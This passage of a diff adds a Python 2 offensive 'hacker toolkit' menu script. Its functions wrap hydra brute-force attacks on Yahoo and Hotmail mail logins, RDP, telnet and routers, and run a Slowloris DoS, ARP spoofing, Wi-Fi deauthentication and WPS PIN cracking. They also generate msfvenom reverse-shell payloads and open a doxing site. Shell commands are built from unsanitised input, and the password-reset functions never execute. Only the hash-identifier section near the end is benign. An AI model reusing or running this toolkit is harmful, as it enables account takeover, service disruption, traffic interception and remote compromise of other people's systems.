raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + print "\nExamples: py, php, exe\n" + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + 